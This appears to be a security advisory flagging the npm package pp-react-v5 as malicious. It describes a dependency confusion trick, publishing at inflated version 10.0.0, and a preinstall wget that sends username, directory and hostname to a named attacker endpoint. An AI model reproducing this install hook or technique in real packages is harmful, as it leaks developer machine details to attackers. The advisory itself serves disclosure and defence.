MAL-2026-3509
Malicious code in pp-react-v5 (npm)
Details
`pp-react-v5` is a dependency confusion package published at the inflated version `10.0.0` to win npm resolution over any internally-hosted package of the same name. The package contains only a `package.json` with no functional source code.
On installation the `preinstall` script executes a `wget` command that sends a GET request to `http://q9ou9xtw.requestrepo.com/` with the current username (`whoami`), working directory (`pwd`), and hostname as query parameters, beaconing the victim machine's identity to the attacker-controlled endpoint.
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (667950ffe2ed24a98495c0d8d6c3430e3538523c5811caf9fbda829b0773163f) The package pp-react-v5 was found to contain malicious code.
## Source: ossf-package-analysis (b2291adfbdded958f2fa2a51aa5e582d8ec4bad5bb1c5c9b614bd496732c3578) The OpenSSF Package Analysis project identified 'pp-react-v5' @ 10.0.0 (npm) as malicious.
It is considered malicious because:
- The package executes one or more commands associated with malicious behavior.
Are you affected?
Enter the version of the package you're using.
Affected packages
0 No fixed version published yet for pp-react-v5 (npm). Pin to a known-safe version or switch to an alternative.